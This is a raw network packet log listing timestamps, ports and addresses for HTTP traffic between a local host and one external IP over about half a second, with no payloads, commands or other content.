Dec 10, 2024 13:11:55.849339962 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.849381924 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.850212097 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.850482941 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.850541115 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.851269007 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.851284981 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.851320982 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.852057934 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.852108002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.852152109 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.852844954 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.852920055 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.852960110 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.853688002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.853744030 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.853786945 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.854516029 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.854756117 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.854804039 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.855444908 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.855458021 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.855494022 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.856282949 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.856667995 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.856718063 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.857074976 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.903285027 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.003557920 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.003571033 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.003737926 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.003752947 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.003902912 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.003947020 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.004462957 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.004489899 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.004539967 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.005367041 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.005471945 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.005516052 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.006201982 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.006259918 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.006302118 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.007204056 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.007675886 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.007723093 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.008232117 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.008480072 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.008527040 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.009268999 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.009282112 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.009320974 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.009888887 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.010176897 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.010224104 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.010696888 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.010910988 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.010957956 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.011498928 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.011590958 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.011636972 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.012367010 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.012576103 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.012622118 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.013195992 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.013361931 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.013407946 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.014036894 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.014075041 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.014122963 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.014977932 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.014997005 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.015047073 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.015784979 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.015851021 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.015894890 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.016694069 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.016765118 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.016807079 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.017606974 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.017761946 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.017807961 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.018443108 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.018800020 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.018846989 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.019270897 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.019706011 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.019752026 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.020117044 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.020284891 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.020332098 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.021023035 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.021367073 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.021410942 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.021859884 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.021933079 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.021976948 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.022757053 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.023423910 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.023463964 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.023627996 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.023650885 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.023695946 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.024561882 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.024573088 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.024612904 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.025394917 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.025954962 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.026000977 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.026253939 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.026540995 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.026587963 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.027179003 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.027214050 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.027256012 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.028044939 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.028647900 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.028693914 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.028892040 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.028904915 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.028944016 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.029737949 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.029942036 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.029985905 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.030616999 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.030630112 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.030668974 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.031768084 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.031780005 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.031817913 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.032550097 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.032562017 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.032597065 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.033169985 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.033760071 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.033802986 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.034085989 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.034154892 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.034199953 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.035326004 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.035418034 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.035463095 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.035825968 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.035967112 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.036012888 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.036715031 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.036866903 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.036911011 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.037688017 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.037707090 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.037755013 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.038609028 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.038620949 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.038661003 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.039319038 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.040080070 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.040134907 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.040266991 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.040278912 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.040316105 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.041152954 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.041203976 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.041244984 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.041934967 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.042455912 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.042494059 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.042843103 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.042855978 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.042893887 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.043658018 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.043749094 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.043812037 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.044544935 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.045427084 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.045439005 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.045478106 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.045502901 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.045547962 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.046418905 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.046637058 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.046683073 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.047153950 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.047306061 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.047353029 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.048049927 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.048221111 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.048264027 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.049066067 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.090795040 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.195456028 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.195489883 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.195540905 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.195707083 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.195838928 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.195875883 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.196580887 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.196747065 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.196791887 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.197465897 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.197478056 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.197521925 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.198400021 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.198411942 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.198452950 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.199342966 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.199426889 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.199470997 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.200133085 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.200177908 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.200222015 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.200944901 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.201026917 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.201070070 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.201992035 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.202003002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.202063084 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.202656031 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.202759981 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.202795029 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.203546047 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.203557968 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.203603983 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.204458952 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.204472065 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.204513073 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.205302954 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.205316067 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.205370903 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.206188917 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.206352949 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.206401110 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.207037926 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.207048893 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.207097054 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.208020926 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.208395004 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.208437920 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.208950043 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.208961964 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.208996058 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.209718943 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.209775925 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.209815979 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.210541964 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.210552931 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.210597038 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.211412907 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.211523056 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.211569071 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.212285995 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.212336063 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.212379932 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.213182926 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.213205099 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.213253021 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.214004040 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.214296103 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.214346886 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.214905024 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.214999914 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.215044022 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.215802908 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.215815067 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.215858936 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.216641903 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.216716051 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.216763020 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.217473030 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.217597961 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.217643023 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.218389988 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.218576908 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.218616009 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.219285965 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.219419956 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.219465971 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.220197916 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.220210075 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.220251083 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.221055031 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.221065998 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.221121073 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.222037077 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.222047091 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.222098112 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.222723007 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.223023891 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.223071098 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.223579884 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.223752975 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.223793983 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.224682093 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.224694014 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.224726915 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.225435019 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.225445986 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.225486994 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.226335049 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.226444006 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.226490021 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.227379084 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.227390051 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.227437019 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.228107929 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.228120089 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.228161097 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.228887081 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.228899002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.228938103 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.229757071 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.229823112 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.229862928 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.230585098 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.230815887 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.230871916 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.231441021 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.231627941 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.231676102 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.232326031 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.232569933 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.232609987 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.233205080 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.233321905 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.233362913 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.234163046 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.234177113 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.234215021 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.234940052 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.235204935 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.235244036 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.235898972 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.235910892 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.235948086 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.236694098 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.236957073 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.237014055 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.237622023 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.237749100 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:56.237791061 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:56.238446951 CET	80	49706	45.9.191.182	192.168.2.5
